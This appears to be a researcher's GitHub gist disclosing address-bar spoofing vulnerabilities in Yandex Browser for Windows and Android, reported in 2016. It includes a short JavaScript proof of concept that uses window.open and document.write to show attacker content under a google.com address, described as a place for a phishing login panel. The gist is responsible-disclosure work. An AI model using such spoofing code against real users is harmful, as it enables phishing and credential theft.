Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?

Yandex Browser - Address Bar Spoofing

Disclaimer: both vulnerabilities were reported to the Yandex Security Team and considered as dupes, so, I was not the first one who discovered them.

Yandex Browser for Windows

This issue was reported 19th July, 2016, 21:36

By making an user visit a page controlled by the attacker and using window.open and document.write functions, it was possible to spoof the URL that is shown.

Workflow:

  • Once the page loads, a function is triggered. In my PoC, the function was triggered when a button is clicked.
  • The function opens a new window by using window.open pointing to the URL that is going to be spoofed.
  • By calling to document.write to that new window, we write a script that calls again to document.write and writes the content, usually this content will be a phising login panel. - My PoC used document.location in order to help them to know the real location insted of the one that the Address Bar was showing.

So, the final code would be:

<script>
function spoof() {
        nWindow = window.open('https:/www.google.com', '_t1');
        nWindow.document.write('<pre>Here we could place a phising login panel</pre>');
}
</script>
<input type="button" onclick="spoof()" value="PoC!">
The page is being hosted in my server

Result

Final email about this vulnerability was:
Hello!

Unfortunately the issue had been reported by another researcher before we got your report. We've been working on the fix for several days and it will be rolled out shortly.

Have a nice day!
--
Vasiliy Kuznetsov Yandex Security Team


Yandex Browser for Android

This issue was reported 19th July, 2016, 18:41

The workflow is exactly the same again.

Before running the PoC:


![ResultMobile1](http://i.imgur.com/jDPQ1mp.jpg)

After running the PoC:


![ResultMobile2](http://i.imgur.com/yOQKHwH.jpg)

Final emails about this vulnerability were:
Hello, Miguel Ángel!

As for Android, I'll check it shortly because it look similar to one report we got the other day. I'll let you know in a few days.

Have a great weekend!

Hello, Miguel Ángel!

I'm sorry, but the same bug had been reported by another researcher before we'd got your report. That's why we can't offer you a reward.

I hope you've enjoyed this write up.

If you're the one who reported this vulnerabilities before me and you want me to remove this post, please, send me a message via Twitter

Kind regards!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.